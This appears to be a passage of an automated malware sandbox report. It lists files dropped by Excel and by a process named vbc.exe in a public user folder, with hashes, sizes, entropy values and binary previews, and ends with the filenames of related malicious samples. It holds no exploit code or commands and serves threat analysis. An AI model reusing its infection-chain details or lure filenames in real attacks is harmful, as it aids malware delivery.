                                                                                                  SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                                                                                                  SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                                                                                                  SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\498FA076.png

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3747
                                                                                                  Entropy (8bit):7.932023348968795
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
                                                                                                  MD5:5EB99F38CB355D8DAD5E791E2A0C9922
                                                                                                  SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
                                                                                                  SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
                                                                                                  SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6281C028.png

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11303
                                                                                                  Entropy (8bit):7.909402464702408
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\770EB209.png

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):10202
                                                                                                  Entropy (8bit):7.870143202588524
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                                                                  MD5:66EF10508ED9AE9871D59F267FBE15AA
                                                                                                  SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                                                                  SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                                                                  SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8852A22.png

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11303
                                                                                                  Entropy (8bit):7.909402464702408
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96A48F8A.jpeg

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4396
                                                                                                  Entropy (8bit):7.884233298494423
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                                                                                                  MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                                                                                                  SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                                                                                                  SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                                                                                                  SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9ADEAFBB.png

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):10202
                                                                                                  Entropy (8bit):7.870143202588524
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                                                                  MD5:66EF10508ED9AE9871D59F267FBE15AA
                                                                                                  SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                                                                  SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                                                                  SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A1C029FF.png

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2647
                                                                                                  Entropy (8bit):7.8900124483490135
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                                                                                                  MD5:E46357D82EBC866EEBDA98FA8F94B385
                                                                                                  SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                                                                                                  SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                                                                                                  SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C0966E80.png

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3747
                                                                                                  Entropy (8bit):7.932023348968795
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
                                                                                                  MD5:5EB99F38CB355D8DAD5E791E2A0C9922
                                                                                                  SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
                                                                                                  SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
                                                                                                  SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C52E2F1C.emf

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1099960
                                                                                                  Entropy (8bit):2.0152800116954332
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:vXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:1ahIFdyiaT2qtXl
                                                                                                  MD5:BD4C089D8210CF4FCF74013334B2B925
                                                                                                  SHA1:1B98EDBC5386B92D82AC9B6174DEE1BC5411CC5E
                                                                                                  SHA-256:BC1A75F99B79C98350DA4BB5561EAC01186DACF8D64F3AE8D4822E1A028644D9
                                                                                                  SHA-512:5D7A6FB4798CC15FFDEF6F5282CD2A07034C4C8C92AFFF6199382F0FA72E9C8B46C625D3B0A7311AD5E3D1EBE27DBDD3E35166A758DC0DB8D974A722FB20B48C
                                                                                                  Malicious:false
                                                                                                  Preview:....l...............C...........m>...&.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................x$...`....f.x.@h.%...<...............d...RQUQ............L.......$QUQ........ ...Id.x........ ............d.x............M....................Oq.....%...X...%...7...................{$..................C.a.l.i.b.r.i............................8.x........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....C.......L.......................P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E164BBF4.jpeg

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4396
                                                                                                  Entropy (8bit):7.884233298494423
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                                                                                                  MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                                                                                                  SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                                                                                                  SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                                                                                                  SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EFD4C365.png

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5396
                                                                                                  Entropy (8bit):7.915293088075047
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                                                                                                  MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                                                                                                  SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                                                                                                  SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                                                                                                  SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..

                                                                                                  C:\Users\user\AppData\Local\Temp\66551383274949876483041.tmp

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                  Category:dropped
                                                                                                  Size (bytes):40960
                                                                                                  Entropy (8bit):0.7798653713156546
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                                                                  MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                                                                  SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                                                                  SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                                                                  SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-console-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18744
                                                                                                  Entropy (8bit):7.080160932980843
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS
                                                                                                  MD5:502263C56F931DF8440D7FD2FA7B7C00
                                                                                                  SHA1:523A3D7C3F4491E67FC710575D8E23314DB2C1A2
                                                                                                  SHA-256:94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
                                                                                                  SHA-512:633EFAB26CDED9C3A5E144B81CBBD3B6ADF265134C37D88CFD5F49BB18C345B2FC3A08BA4BBC917B6F64013E275239026829BA08962E94115E94204A47B80221
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: kendrickzx.exe, Detection: malicious, Browse
                                                                                                  • Filename: YWwWTAJQeT.exe, Detection: malicious, Browse
                                                                                                  • Filename: New Purchase Order (PO#0060919).exe, Detection: malicious, Browse
                                                                                                  • Filename: D42926EB5339410141C90BAD9B9B0B3C5CC00FCF0E1A4.exe, Detection: malicious, Browse
                                                                                                  • Filename: tAWBSuntmR.exe, Detection: malicious, Browse
                                                                                                  • Filename: 3pSZ2QZRAR.exe, Detection: malicious, Browse
                                                                                                  • Filename: IRQ2107799.jar, Detection: malicious, Browse
                                                                                                  • Filename: Payment Swift Transfer.jar, Detection: malicious, Browse
                                                                                                  • Filename: ORDER LIST.exe, Detection: malicious, Browse
                                                                                                  • Filename: I-PK-66729559684-D027834252022011003150.exe, Detection: malicious, Browse
